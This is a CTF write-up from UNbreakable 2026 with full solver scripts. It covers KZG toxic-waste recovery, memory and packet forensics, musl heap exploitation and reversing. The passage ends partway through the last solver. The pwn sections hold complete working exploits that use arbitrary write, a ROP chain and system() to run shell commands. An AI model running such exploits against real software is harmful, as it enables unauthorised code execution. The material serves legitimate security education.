💎UNbreakable 2026

Probably my last CTF for a while. Pretty late publishing this, was same weekend as DiceCTF.

cryptography

toxicwaste

Description

The service implements a KZG-style opening check on the supersingular curve y^2 = x^3 + 1 over GF(p), with p = 6q - 1 and subgroup order q.

It publishes a shuffled SRS:

points alpha^i * G1 for i = 0..39
matching coefficients of a degree-39 polynomial A(x) such that A(alpha) = 0

The intended protection is the shuffle, but the curve is pairing-friendly and exposes enough structure to undo it.

Solution

Let P_i = alpha^i * G1. The important leak is:

sum coeff_i * P_i = 0

which means the published coefficients form a vanishing polynomial A(x) with root alpha.

The only obstacle is that the tuples are shuffled. On this curve there is an efficient distortion map:

psi((x, y)) = (zeta * x, y) where zeta^3 = 1, zeta != 1

and therefore

e(P_i, psi(P_j)) = e(G1, psi(G1))^(alpha^(i+j))

So pairings let us recognize when two published points correspond to exponent addition. Using that, we recover the hidden order of the SRS points:

identify G1 = alpha^0 * G1
find the unique published point acting as alpha^1 * G1
repeatedly add exponents via pairing comparisons to walk the whole chain alpha^0, alpha^1, ..., alpha^39

Once the order is known, the shuffled coefficients become the actual polynomial

A(x) = a_0 + a_1 x + ... + a_39 x^39

We solve A(x) = 0 over GF(q) and keep the root whose powers really reproduce the published points. That gives the toxic waste alpha.

After recovering alpha, the verifier is completely broken. We commit to the degree-41 polynomial:

f(x) = x^41

This is enough because the service only prints the flag when the interpolated polynomial has degree > 40.

For a query point z, send:

y = z^41 mod q
pi = ((alpha^41 - z^41) / (alpha - z)) * G1

Then the pairing check is exactly the KZG opening equation for f.

Solver used:

from ast import literal_eval
import re
import socket
import sys

from sage.all_cmdline import *


HOST = "34.159.87.224"
PORT = 31838
DEG = 41
QUERIES = 100


class Tube:
    def __init__(self, host, port, timeout=180):
        self.sock = socket.create_connection((host, port))
        self.sock.settimeout(timeout)
        self.buf = b""

    def recv_until(self, token):
        while token not in self.buf:
            chunk = self.sock.recv(65536)
            if not chunk:
                raise EOFError("connection closed before token")
            self.buf += chunk
        idx = self.buf.index(token) + len(token)
        out = self.buf[:idx]
        self.buf = self.buf[idx:]
        return out

    def recv_match(self, pattern):
        while True:
            m = re.search(pattern, self.buf)
            if m:
                out = m
                self.buf = self.buf[m.end():]
                return out
            chunk = self.sock.recv(65536)
            if not chunk:
                raise EOFError("connection closed before regex match")
            self.buf += chunk

    def send_line(self, s):
        if isinstance(s, str):
            s = s.encode()
        self.sock.sendall(s + b"\n")

    def recv_all(self):
        chunks = [self.buf]
        self.buf = b""
        while True:
            try:
                chunk = self.sock.recv(65536)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)


def psi(E2, zeta, P):
    if P == 0:
        return P
    return E2((zeta * P[0], P[1]))


def parse_banner(data):
    text = data.decode()
    p = int(re.search(r"p = (\d+)", text).group(1))
    pub_text = re.search(r"pub = (\[.*\])\s*C = $", text, re.S).group(1)
    pub = literal_eval(pub_text)
    return p, pub


def recover_alpha(p, pub):
    E = EllipticCurve(GF(p), [0, 1])
    G1 = 6 * E.gens()[0]
    o = Integer(G1.order())

    Fp2 = GF(p**2, "x", modulus=[1, 1, 1])
    zeta = Fp2.gen()
    E2 = EllipticCurve(Fp2, [0, 1])
    G1e = E2(G1)

    pts = []
    coeffs = []
    for (xy, coeff) in pub:
        pts.append(E2(E(xy)))
        coeffs.append(Integer(coeff) % o)

    basevals = [P.weil_pairing(psi(E2, zeta, G1e), o) for P in pts]
    lookup = {v: i for i, v in enumerate(basevals)}
    id_idx = pts.index(G1e)

    order = None
    for cand in range(len(pts)):
        cur = id_idx
        seq = [id_idx]
        seen = {id_idx}
        ok = True
        for _ in range(len(pts) - 1):
            nxt = lookup.get(pts[cur].weil_pairing(psi(E2, zeta, pts[cand]), o))
            if nxt is None or nxt in seen:
                ok = False
                break
            seq.append(nxt)
            seen.add(nxt)
            cur = nxt
        if ok:
            order = seq
            break

    if order is None:
        raise ValueError("failed to recover point order")

    R = PolynomialRing(GF(o), "x")
    x = R.gen()
    A = sum(R(coeffs[order[i]]) * x**i for i in range(len(order)))

    alpha = None
    for root in A.roots(multiplicities=False):
        power = Integer(1)
        ok = True
        for i, idx in enumerate(order):
            if i > 0:
                power = (power * Integer(root)) % o
            if E2(power * G1) != pts[idx]:
                ok = False
                break
        if ok:
            alpha = Integer(root)
            break

    if alpha is None:
        raise ValueError("failed to identify alpha")

    return E, G1, o, alpha


def main():
    io = Tube(HOST, PORT)
    banner = io.recv_until(b"C = ")
    p, pub = parse_banner(banner)
    E, G1, o, alpha = recover_alpha(p, pub)

    commit_scalar = power_mod(alpha, DEG, o)
    C = Integer(commit_scalar) * G1
    io.send_line(f"{int(C[0])},{int(C[1])}")

    for _ in range(QUERIES):
        m = io.recv_match(rb"z = (\d+)\r?\n")
        z = Integer(m.group(1).decode())
        zm = z % o
        y = Integer(power_mod(zm, DEG, o))
        if zm == alpha:
            proof_scalar = (DEG * power_mod(alpha, DEG - 1, o)) % o
        else:
            proof_scalar = ((commit_scalar - y) * inverse_mod(alpha - zm, o)) % o
        pi = Integer(proof_scalar) * G1
        io.send_line(str(int(y)))
        io.send_line(f"{int(pi[0])},{int(pi[1])}")

    out = io.recv_all().decode(errors="replace")
    sys.stdout.write(out)


if __name__ == "__main__":
    main()

Flag:

flag{Alph4_h4s_t0_b3_1nc1n3r4t3d_947a1a1e8895d3d483ab}

forensics

RAM Vault Beacon Malware

Description

Given a Linux RAM dump (memory.lime) from a compromised system, recover the challenge flag.

Solution

Recovered malware source strings in RAM show the vault/key logic:

ts_window = floor(time(NULL)/600)*600
ikm = SHA256(machine_id || TASK_ID || ts_window_le8 || SHA256(STAGE_ARGS_B64))
key = SHA256(KDF_SALT || ikm || "rocsc/vault")
aad = SHA256(machine_id || TASK_ID)
Vault format: header (5 little-endian u32: version, nonce_len, pt_len, ct_len, crc32_ct) + nonce(24) + ciphertext(48)
AEAD: XChaCha20-Poly1305.

Recovered runtime artifacts from RAM:

TASK_ID=1bcec366-9649-4a61-8c2d-9c6b2c2a702a
KDF_SALT=d17025e353b5380823b9eef194ef33ad
STAGE_ARGS_B64=TRVnDl1dSQDmaFZohHQdYe0nqpAS+w9qgphZ9rBC7gARGbEalpjyTCw+o/KopwZzIg4OQ8W/3m7tuiOy7/74AgA=
POST body in RAM:
- task=1bcec366-9649-4a61-8c2d-9c6b2c2a702a
- ts=1772107800
- fp=aa7f195dcaa55dc92809fc10278fcb13feea281ac564cd70141ba17f64bd5c5d00000000c2b6b1572b7e2b0417fd86c9819af720a80df32383d03567b93a7bb71deb27b9
- hmac=4b322b9f3362762f829ef3b43a461fdeeba8de09d5ec3d2e98bae67235fe66fa
Machine-id recovered by matching SHA256(machine_id) to the first 32 bytes of fp:
- machine_id=783abf8dcd8846d889fee75ae6b1046a

Reproducible solver code used:

#!/usr/bin/env python3
import base64
import hashlib
import hmac
import mmap
import struct
import zlib
from nacl.bindings import crypto_aead_xchacha20poly1305_ietf_decrypt

MEM = "memory.lime"
TASK_ID = "1bcec366-9649-4a61-8c2d-9c6b2c2a702a"
KDF_SALT_HEX = "d17025e353b5380823b9eef194ef33ad"
STAGE_ARGS_B64 = "TRVnDl1dSQDmaFZohHQdYe0nqpAS+w9qgphZ9rBC7gARGbEalpjyTCw+o/KopwZzIg4OQ8W/3m7tuiOy7/74AgA="
TS_WINDOW = 1772107800
MACHINE_ID = "783abf8dcd8846d889fee75ae6b1046a"
FP = "aa7f195dcaa55dc92809fc10278fcb13feea281ac564cd70141ba17f64bd5c5d00000000c2b6b1572b7e2b0417fd86c9819af720a80df32383d03567b93a7bb71deb27b9"
HMAC_EXPECT = "4b322b9f3362762f829ef3b43a461fdeeba8de09d5ec3d2e98bae67235fe66fa"
DNS_LAST_IP = bytes([66, 254, 114, 41])

# Derive key exactly as malware
args_hash = hashlib.sha256(STAGE_ARGS_B64.encode()).digest()
ts_le8 = struct.pack("<Q", TS_WINDOW)
ikm = hashlib.sha256(
    MACHINE_ID.encode() + TASK_ID.encode() + ts_le8 + args_hash
).digest()
key = hashlib.sha256(bytes.fromhex(KDF_SALT_HEX) + ikm + b"rocsc/vault").digest()
aad = hashlib.sha256(MACHINE_ID.encode() + TASK_ID.encode()).digest()

# Validate against beacon hmac
calc_hmac = hmac.new(key, bytes.fromhex(FP) + ts_le8 + DNS_LAST_IP, hashlib.sha256).hexdigest()
assert calc_hmac == HMAC_EXPECT

# Scan for vault headers and decrypt valid candidates
magic = struct.pack("<IIII", 3, 24, 32, 48)
seen = set()
results = []

with open(MEM, "rb") as f:
    overlap = b""
    off = 0
    while True:
        chunk = f.read(4 * 1024 * 1024)
        if not chunk:
            break
        buf = overlap + chunk
        i = 0
        while True:
            p = buf.find(magic, i)
            if p == -1:
                break
            if p + 92 <= len(buf):
                crc_stored = struct.unpack_from("<I", buf, p + 16)[0]
                nonce = buf[p + 20:p + 44]
                ct = buf[p + 44:p + 92]
                if (zlib.crc32(ct) & 0xFFFFFFFF) == crc_stored:
                    sig = (nonce, ct)
                    if sig not in seen:
                        seen.add(sig)
                        try:
                            pt = crypto_aead_xchacha20poly1305_ietf_decrypt(ct, aad, nonce, key)
                            results.append((off - len(overlap) + p, nonce, ct, pt))
                        except Exception:
                            pass
            i = p + 1
        overlap = buf[-100:]
        off += len(chunk)

assert len(results) == 1
vault_off, nonce, ct, pt = results[0]
print("vault_offset", vault_off)
print("nonce", nonce.hex())
print("ciphertext", ct.hex())
print("pt_hex", pt.hex())
print("pt_b64", base64.b64encode(pt).decode())

Output plaintext:

hex: 55eb337497c226fadcd74648227da4831106f06439145d500bb383b47bfa8745

Submitted flag:

CTF{55eb337497c226fadcd74648227da4831106f06439145d500bb383b47bfa8745}

Relay in the Noise

Description

A packet capture from a Linux packet-radio relay box is provided. Recover the hidden message/flag from the capture.

Solution

The useful traffic is in the KISS/AX.25 packets (udp 49712 -> 8001) near the end of the pcap.

Key observations:

BLT/xx/17:<base32> messages from N9VHF-9 contain the ciphertext fragments.
A chat line gives the mask rule: sha256(lower(grid)|ssid).
A beacon includes qth=FN31pr, so lower(grid) = fn31pr.
Sender SSID for the real BLT stream is 9 (N9VHF-9).

Reconstruction/decryption that works:

Reassemble /17 bulletin chunks in index order 01..17.
Base32-decode the concatenated text to get 127-byte ciphertext.
Build keystream in counter mode using SHA-256 with seed b"fn31pr|9":
- block i = sha256(seed + i.to_bytes(4, "big"))
XOR ciphertext with keystream.
zlib-decompress the XOR output.

Recovered plaintext: OPORDER|relay=old_water_tower|window=0215z|flag=UNR{4x25_p47h5_4nd_6r1d_5qu4r35_73ll_7h3_570ry_2fee56dc8f22f6a7}|note=burn_after_reading

Flag: UNR{4x25_p47h5_4nd_6r1d_5qu4r35_73ll_7h3_570ry_2fee56dc8f22f6a7}

#!/usr/bin/env python3
import base64
import hashlib
import subprocess
import re
import zlib

PCAP = "attachments/rf_relay_capture.pcap"

# Pull UDP payloads from tshark
out = subprocess.check_output(
    [
        "tshark", "-r", PCAP,
        "-T", "fields",
        "-E", "separator=\t",
        "-e", "frame.number",
        "-e", "udp.payload",
    ],
    text=True,
)

blt17 = {}
grid = None

for line in out.splitlines():
    parts = line.split("\t")
    if len(parts) < 2 or not parts[1]:
        continue

    payload = bytes.fromhex(parts[1].strip())

    # KISS frame expected: C0 <cmd> <ax25...> C0
    if not (len(payload) >= 3 and payload[0] == 0xC0 and payload[-1] == 0xC0):
        continue

    frame = payload[2:-1]
    i = frame.find(b"\x03\xF0")
    if i == -1:
        continue

    info = frame[i + 2 :]
    try:
        s = info.decode("ascii")
    except UnicodeDecodeError:
        continue

    # qth grid
    m_qth = re.search(r"qth=([A-Za-z0-9]+)", s)
    if m_qth:
        grid = m_qth.group(1).lower()

    # BLT chunks
    m_blt = re.fullmatch(r"BLT/(\d{2})/(\d{2}):([A-Z2-7]+)", s)
    if m_blt and int(m_blt.group(2)) == 17:
        idx = int(m_blt.group(1))
        blt17[idx] = m_blt.group(3)

if len(blt17) != 17:
    raise SystemExit(f"Expected 17 chunks, got {len(blt17)}")
if not grid:
    raise SystemExit("Could not find grid (qth=...)")

# Reassemble ciphertext (indices 1..17)
ctext_b32 = "".join(blt17[i] for i in range(1, 18))
cipher = base64.b32decode(ctext_b32 + "=" * ((8 - len(ctext_b32) % 8) % 8))

# Per clue: sha256(lower(grid)|ssid), ssid from N9VHF-9 => 9
seed = f"{grid}|9".encode()

# SHA-256 counter-mode keystream: sha256(seed || be32(counter))
ks = b""
counter = 0
while len(ks) < len(cipher):
    ks += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
    counter += 1
ks = ks[:len(cipher)]

masked = bytes(c ^ k for c, k in zip(cipher, ks))
plain = zlib.decompress(masked).decode()
print(plain)

flag = re.search(r"(UNR\{[^}]+\})", plain)
print(flag.group(1) if flag else "Flag not found")

Tokio Magic

Description

Forensics challenge about a malware detonation on a Windows image. The flag format was:

UNR{ans1_ans2_ans3_ans4_ans5}

Questions:

Keyboard layouts installed/used by the user
Modification timestamp of the Defrag prefetch file
SHA-256 hash of the malware detonated on the machine
First part of the flag string
Last part of the flag string

Solution

Part 1 was normalized as English. The local layout evidence pointed to a single English/US layout.

Part 2 came from the prefetch file, not defrag.exe itself. The correct file was Windows/Prefetch/DEFRAG.EXE-738093E8.pf, MFT record 103949.

istat -f ntfs extracted/UNRTokio.raw 103949
ntfsinfo -i 103949 extracted/UNRTokio.raw

Relevant timestamp:

File Altered Time: Mon Dec 16 19:03:29 2024 UTC

So part 2 was:

2024-12-16 19:03:29

Part 3 was the 2026 sample, not the older rejected bf575... branch. The strongest chain was:

I_see_you.zip.7878kr5jx in Downloads had a preserved Zone.Identifier.
That ADS pointed to MalwareBazaar download URL .../723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224/.
USN showed 723d...exe created on the Desktop and renamed to svch.exe.
UserAssist showed C:\Users\Masquerade\Desktop\svch.exe executed.
The recovered svch.exe hashed to the same 723d... value.

Useful commands:

istat -f ntfs extracted/UNRTokio.raw 28921
ffind -f ntfs extracted/UNRTokio.raw 28921
sha256sum svch.exe

The final malware hash was:

723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224

Part 4 came from Chrome JumpList data. jumplist_31180.bin contained both the MalwareBazaar download URL and a Pastebin entry whose title already exposed the answer.

strings -el jumplist_31180.bin | nl -ba | sed -n '1,30p'

Relevant lines:

8  @--win-jumplist-action=most-visited https://pastebin.com/yCheGkhf
11 First part of the flag is: Congrats_boy - Pastebin.com

The page itself also confirmed it:

curl -L -s https://pastebin.com/raw/yCheGkhf

Output:

First part of the flag is: Congrats_boy

So part 4 was:

Congrats_boy

Part 5 came from decrypting secret.enc using the XOR keystream derived from the known plaintext pair know.txt and know.txt.7878kr5jx.

from pathlib import Path

plain = Path("know.txt").read_bytes()
enc = Path("know.txt.7878kr5jx").read_bytes()[:len(plain)]
keystream = bytes(a ^ b for a, b in zip(plain, enc))

secret = Path("secret.enc.bin").read_bytes()
out = bytes(b ^ keystream[i % len(keystream)] for i, b in enumerate(secret))
print(out.rstrip(b"\x00").decode())

Recovered text:

Last part of the  F l A g is : amaz1ng_j0b_y0udeserve_it

So part 5 was:

amaz1ng_j0b_y0udeserve_it

Final flag:

UNR{English_2024-12-16 19:03:29_723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224_Congrats_boy_amaz1ng_j0b_y0udeserve_it}

pwn

atypical heap

Description

The binary is a musl-based note manager with two useful bugs:

read note only checks sz <= 0x100, not sz <= notes[idx].size, so it over-reads past the note.
Hidden menu option 5 is an unlimited aligned 8-byte arbitrary write. The code sets magic_used = 1 once, but never checks it.

The goal is to turn a musl mallocng heap leak into a PIE leak, then into full arbitrary read/write, and finally into code execution.

Solution

For a first malloc(0x70), the over-read at offset 0x80 leaks meta0 + 0x28, which is the next free struct meta slot in the same meta_area. That gives a reliable heap pointer.

Using the arbitrary write:

Treat that next free meta slot as a fake active group.
Rewire the real meta0 so the next 0x70 allocation advances to the fake one.
Make the fake meta return a note whose data pointer lands on the original meta0.
Reading that forged note reveals meta0->mem, which points at the live group in the anonymous mapping next to the PIE.
For the first 0x70 allocation, meta0->mem is always chall_base + 0x3f20, so chall_base = meta0->mem - 0x3f20.
With the PIE base known, overwrite a notes[] entry to point anywhere and use note read/write as arbitrary read/write.
Leak printf@got to recover the musl base.
Overwrite musl's atexit builtin list so exit(0) calls system("sh -c 'cat ...flag...'").

Exploit:

#!/usr/bin/env python3
from pwn import *

context.binary = ELF("./dist/chall", checksec=False)
libc = ELF("./dist/libc.so", checksec=False)
context.log_level = "info"


def start():
    return process(["./dist/libc.so", "./dist/chall"], cwd=".")


def cmd(io, choice):
    io.sendlineafter(b"> ", str(choice).encode())


def alloc(io, idx, size):
    cmd(io, 1)
    io.sendlineafter(b"index: ", str(idx).encode())
    io.sendlineafter(b"Enter size: ", str(size).encode())


def write_note(io, idx, data):
    cmd(io, 3)
    io.sendlineafter(b"index: ", str(idx).encode())
    io.sendlineafter(b"size: ", str(len(data)).encode())
    io.sendafter(b"data: ", data)


def read_note(io, idx, size):
    cmd(io, 4)
    io.sendlineafter(b"index: ", str(idx).encode())
    io.sendlineafter(b"size: ", str(size).encode())
    return io.recvn(size)


def magic(io, addr, value):
    cmd(io, 5)
    io.sendlineafter(b"address: ", hex(addr).encode())
    io.sendlineafter(b"value: ", str(value & ((1 << 64) - 1)).encode())


def forge_note(io, notes_base, idx, target, size=0x100):
    entry = notes_base + idx * 0x10
    magic(io, entry, target)
    magic(io, entry + 8, size)


def arb_read(io, notes_base, idx, target, size):
    forge_note(io, notes_base, idx, target, max(size, 0x100))
    return read_note(io, idx, size)


def arb_write(io, notes_base, idx, target, data):
    forge_note(io, notes_base, idx, target, max(len(data), 0x100))
    write_note(io, idx, data)


def main():
    io = start()

    alloc(io, 0, 0x70)
    leak = read_note(io, 0, 0x100)
    meta0 = u64(leak[0x80:0x88]) - 0x28
    fake = meta0 + 0x28
    log.info(f"meta0 = {meta0:#x}")
    log.info(f"fake  = {fake:#x}")

    magic(io, meta0 - 8, 0x00FF0100)
    magic(io, fake + 0x00, fake)
    magic(io, fake + 0x08, fake)
    magic(io, fake + 0x10, meta0 - 0x10)
    magic(io, fake + 0x18, 1 << 32)
    magic(io, fake + 0x20, 7 << 6)
    magic(io, meta0 + 0x00, fake)
    magic(io, meta0 + 0x08, fake)
    magic(io, meta0 + 0x18, 1 << 32)

    alloc(io, 1, 0x70)
    meta_dump = read_note(io, 1, 0x40)
    group = u64(meta_dump[0x10:0x18])
    chall_base = group - 0x3F20
    notes_base = chall_base + 0x3020
    printf_got = chall_base + 0x2F70
    printf_addr = u64(arb_read(io, notes_base, 2, printf_got, 8))
    libc_base = printf_addr - libc.sym["printf"]

    log.info(f"chall_base = {chall_base:#x}")
    log.info(f"libc_base  = {libc_base:#x}")

    builtin = libc_base + 0xA36A0
    head = libc_base + 0xA5DC8
    lock_slot = libc_base + 0xA5FE0
    cmd_buf = notes_base + 0x400
    shell_cmd = b"sh -c 'cat /srv/dist/flag.txt || cat dist/flag.txt || cat flag.txt'\x00"

    arb_write(io, notes_base, 2, cmd_buf, shell_cmd)
    magic(io, builtin + 0x00, 0)
    magic(io, builtin + 0x08, libc_base + libc.sym["system"])
    magic(io, builtin + 0x108, cmd_buf)
    magic(io, lock_slot, 0x100000000)
    magic(io, head, builtin)

    cmd(io, 6)
    out = io.recvall(timeout=2)
    print(out.decode("latin-1", errors="replace"), end="")


if __name__ == "__main__":
    main()

atyipical-heap-revenge

Description

The binary has two obvious bugs:

NOTE_READ trusts the user-supplied read length up to 0x100 instead of the note's real size, so small allocations become bounded OOB reads.
Hidden menu choice 5 is an unlimited aligned 8-byte arbitrary write because magic_used is never enforced.

The intended twist is musl's allocator. Small allocations live inside nested groups, so an OOB read from the last slot of a group can leak the next group's header and therefore a musl meta pointer. Once one accessible group's meta->mem field is overwritten, a normal allocation can be redirected to an arbitrary address.

Solution

The exploit uses two musl groups:

Allocate one 0x70 note and read 0x100 bytes from it. At offset 0x80 this leaks a heap meta pointer for a single-slot sc3 group. I use that group as an arbitrary-address reader for one allocation of size 0x30.
Allocate 30 notes of size 1. Reading 0x40 bytes from the 30th note leaks another heap meta pointer at offset 0x10, this time for a single-slot sc11 group.
Overwrite the leaked sc3 group's meta->mem with meta_a - 0x10, then allocate a 0x30 note. That note lands on meta_a, so reading it leaks meta_a->mem.
meta_a->mem is always at mapping_start + 0x2ec0, where mapping_start is the anonymous RW mapping placed after libc. libc is still a fixed delta from there, but the PIE delta was not stable between local and remote, so I do not guess it.
Instead, I reuse the leaked sc11 group once more to read the post-libc pointer table at mapping_start + 0x1680. The qword at table offset 0x40 is the exact PIE base for the current run.
The same post-libc mapping contains a stable stack anchor at mapping_start + 0x1da0. During the blocking read() used by NOTE_WRITE, the saved return address is always at stack_anchor - 0x88.
Write "cat flag.txt" into an unused notes entry in .bss, repoint a note at the live read() return address, and use NOTE_WRITE itself to place a short ROP chain there: ret; pop rdi; "cat flag.txt"; system; pop rdi; 0; exit

That returns out of the in-flight read() directly into system("cat flag.txt").

#!/usr/bin/env python3
from pathlib import Path
import sys

from pwn import ELF, ROP, context, flat, process, remote, u64


ROOT = Path(__file__).resolve().parent
DIST = ROOT / "dist"
CHALL = DIST / "chall"
LIBC = DIST / "libc.so"

context.arch = "amd64"
context.log_level = "error"

elf = ELF(str(CHALL), checksec=False)
libc = ELF(str(LIBC), checksec=False)
rop = ROP(libc)

RET = rop.find_gadget(["ret"]).address
POP_RDI = rop.find_gadget(["pop rdi", "ret"]).address
NOTES_OFF = elf.symbols["notes"]


class Exploit:
    def __init__(self, io):
        self.io = io
        self.pie = 0
        self.notes = 0

    def choose(self, choice):
        self.io.sendlineafter(b"> ", str(choice).encode())

    def alloc(self, idx, size):
        self.choose(1)
        self.io.sendlineafter(b"index: ", str(idx).encode())
        self.io.sendlineafter(b"Enter size: ", str(size).encode())

    def note_read(self, idx, size):
        self.choose(4)
        self.io.sendlineafter(b"index: ", str(idx).encode())
        self.io.sendlineafter(b"size: ", str(size).encode())
        return self.io.recvn(size)

    def note_write(self, idx, data):
        self.choose(3)
        self.io.sendlineafter(b"index: ", str(idx).encode())
        self.io.sendlineafter(b"size: ", str(len(data)).encode())
        self.io.sendafter(b"data: ", data)

    def magic(self, addr, value):
        self.choose(5)
        self.io.sendlineafter(b"address: ", hex(addr).encode())
        self.io.sendlineafter(b"value: ", str(value).encode())

    def set_note_ptr(self, idx, addr, size=0x100):
        entry = self.notes + idx * 16
        self.magic(entry, addr)
        self.magic(entry + 8, size)

    def write_bytes(self, addr, data):
        padded = data
        if len(padded) % 8:
            padded += b"\x00" * (8 - len(padded) % 8)
        for off in range(0, len(padded), 8):
            self.magic(addr + off, u64(padded[off : off + 8]))

    def run(self):
        self.alloc(0, 0x70)
        meta_b = u64(self.note_read(0, 0x100)[0x80:0x88])

        for idx in range(1, 31):
            self.alloc(idx, 1)
        meta_a = u64(self.note_read(30, 0x40)[0x10:0x18])

        self.magic(meta_b + 0x10, meta_a - 0x10)
        self.alloc(31, 0x30)
        a_meta = self.note_read(31, 0x30)
        a_mem = u64(a_meta[0x10:0x18])

        mapping_start = a_mem - 0x2EC0
        libc.address = mapping_start - 0xA4000

        self.magic(meta_a + 0x10, mapping_start + 0x1680 - 0x10)
        self.alloc(32, 0xC0)
        table = self.note_read(32, 0x100)
        self.pie = u64(table[0x40:0x48])
        self.notes = self.pie + NOTES_OFF

        self.set_note_ptr(31, mapping_start + 0x1DA0, 8)
        sp_anchor = u64(self.note_read(31, 8))
        read_ret = sp_anchor - 0x88

        cmd_addr = self.notes + 40 * 16
        self.write_bytes(cmd_addr, b"cat flag.txt\x00")

        chain = flat(
            [
                libc.address + RET,
                libc.address + POP_RDI,
                cmd_addr,
                libc.symbols["system"],
                libc.address + POP_RDI,
                0,
                libc.symbols["exit"],
            ],
            word_size=64,
        )

        self.set_note_ptr(31, read_ret, len(chain))
        self.note_write(31, chain)

        out = self.io.recvall(timeout=2)
        sys.stdout.buffer.write(out)


def start():
    if len(sys.argv) == 3:
        return remote(sys.argv[1], int(sys.argv[2]))
    return process([str(LIBC), str(CHALL)], cwd=str(DIST))


def main():
    io = start()
    try:
        Exploit(io).run()
    finally:
        io.close()


if __name__ == "__main__":
    main()

reverse_engineering

jumpy

Description

The binary reads up to 0x100 bytes from stdin, pads to 32-byte blocks, transforms each block, and writes the result to enc.sky. The provided enc.sky is the encrypted target.

The interesting part is that the per-block logic is stored in 14 code blocks around 0x401fd3, but those blocks are XOR-masked and only decrypted right before execution. The dispatcher also re-encrypts the previous block after each jump.

Solution

The block decryptor is:

mask_byte = ((37 * block_id + 13 * offset) & 0xff) ^ 0xcb;
code[offset] ^= mask_byte;

Decoding those 14 blocks shows that only a subset is live. The effective encryption on each 32-byte block is:

Build seed = SHA256("UNBR26::GrayInterleaveSbox::v1" || 1337c0de26aabbccdeadbeef42241999).
Build a 256-byte permutation with a Fisher-Yates shuffle driven by SHA256(seed || counter_le32) output bytes.
For block index blk, build ks = SHA256(seed || "KS" || blk_le32).
For each byte pair (pos, pos+1) inside the 32-byte block:
- x ^= ks[pos]
- x = x + (31*blk + 17*pos) mod 256
- x = x ^ (x >> 1) (Gray encode)
- Do that for both bytes.
- Swap the low nibbles between the two bytes.
- Substitute each byte through the shuffled permutation.
- Rotate each byte left by ks[pos] & 7.
The file uses PKCS#7-style padding to 32 bytes.

To decrypt, invert those steps in reverse order:

#!/usr/bin/env python3
from hashlib import sha256
from pathlib import Path


def rol8(x: int, r: int) -> int:
    r &= 7
    return ((x << r) | (x >> (8 - r))) & 0xFF if r else x


def ror8(x: int, r: int) -> int:
    r &= 7
    return ((x >> r) | (x << (8 - r))) & 0xFF if r else x


def gray_decode(g: int) -> int:
    x = g
    x ^= x >> 1
    x ^= x >> 2
    x ^= x >> 4
    return x & 0xFF


def build_permutation(seed: bytes) -> tuple[list[int], list[int]]:
    perm = list(range(256))
    counter = 0
    block = b""
    block_index = 32

    for i in range(255, 0, -1):
        if block_index > 31:
            block = sha256(seed + counter.to_bytes(4, "little")).digest()
            counter += 1
            block_index = 0

        j = block[block_index] % (i + 1)
        block_index += 1
        perm[i], perm[j] = perm[j], perm[i]

    inv = [0] * 256
    for i, v in enumerate(perm):
        inv[v] = i
    return perm, inv


def decrypt_block(block: bytes, block_index: int, seed: bytes, inv_perm: list[int]) -> bytes:
    ks = sha256(seed + b"KS" + block_index.to_bytes(4, "little")).digest()
    out = bytearray(block)

    for pos in range(0, 32, 2):
        a = out[pos]
        b = out[pos + 1]

        a = ror8(a, ks[pos] & 7)
        b = ror8(b, ks[pos + 1] & 7)

        a = inv_perm[a]
        b = inv_perm[b]

        a, b = ((a & 0xF0) | (b & 0x0F), (b & 0xF0) | (a & 0x0F))

        a = gray_decode(a)
        b = gray_decode(b)

        a = (a - ((31 * block_index + 17 * pos) & 0xFF)) & 0xFF
        b = (b - ((31 * block_index + 17 * (pos + 1)) & 0xFF)) & 0xFF

        a ^= ks[pos]
        b ^= ks[pos + 1]

        out[pos] = a
        out[pos + 1] = b

    return bytes(out)


def main() -> None:
    key = b"UNBR26::GrayInterleaveSbox::v1"
    iv = bytes.fromhex("1337c0de26aabbccdeadbeef42241999")
    seed = sha256(key + iv).digest()
    _, inv_perm = build_permutation(seed)

    ciphertext = Path("attachments/enc.sky").read_bytes()
    plaintext = bytearray()

    for block_index in range(len(ciphertext) // 32):
        chunk = ciphertext[block_index * 32:(block_index + 1) * 32]
        plaintext.extend(decrypt_block(chunk, block_index, seed, inv_perm))

    pad = plaintext[-1]
    if 1 <= pad <= 32 and plaintext.endswith(bytes([pad]) * pad):
        plaintext = plaintext[:-pad]

    print(plaintext.decode())


if __name__ == "__main__":
    main()

Running it prints:

UNBR{daca_faci_challu_esti_magnat_si_ai_furat_34_67_date_personales_boss}

riga crypto

Description

Reverse an npm package that drops a PyInstaller/PyArmor GUI wrapper around a custom Go shared library and recover the plaintext behind attachments/flag.enc.

Solution

embedded_app is a distraction layer. The useful path is:

Deobfuscate the package enough to extract the dropped binaries.
Execute the PyArmor payload under a local CPython 3.13 build with a stub pygame module.
Confirm the Python code only calls libmylib.so's EncryptFileHex(path, ignored) on flag.txt.
Recover the fixed AES layer from the Go library globals:
- key bytes: ASCII 021b49755fb4961a40f3a539ee80fa8f
- IV bytes: ASCII 8cc46e76876a55c1
- trailer: ASCII 67e672f4049b06ee
Decrypt flag.enc to get the transformed flag bytes.
Reverse the Go byte pipeline with chosen-input tests and gdb snapshots.
Re-encrypt the recovered candidate through the original library and verify it matches attachments/flag.enc exactly.

Recovered flag:

UNR{cu_m454l4r174-m1r3454_54-1_713_d3_1mp4r473454_f4abc8120c3d2a57}

Exact solver:

#!/usr/bin/env python3
from __future__ import annotations

from pathlib import Path

from Crypto.Cipher import AES


ROOT = Path(__file__).resolve().parent
FLAG_ENC = ROOT / "attachments" / "flag.enc"

KEY_ASCII = b"021b49755fb4961a40f3a539ee80fa8f"
IV_ASCII = b"8cc46e76876a55c1"
TRAILER = b"67e672f4049b06ee"


def ror8(value: int, count: int) -> int:
    count &= 7
    return ((value >> count) | ((value << (8 - count)) & 0xFF)) & 0xFF


def affine_inv(data: bytes) -> bytes:
    return bytes((((byte - 0x53) & 0xFF) * 0x0D) & 0xFF for byte in data)


def lfsr_xor(data: bytes, seed: int) -> bytes:
    state = seed
    out = bytearray()
    for byte in data:
        bit = ((state >> 0) ^ (state >> 2) ^ (state >> 3) ^ (state >> 5)) & 1
        state = ((state >> 1) | (bit << 15)) & 0xFFFF
        out.append(byte ^ (state & 0xFF))
    return bytes(out)


def lfsr_inv(data: bytes) -> bytes:
    return lfsr_xor(data, 0xACE1)

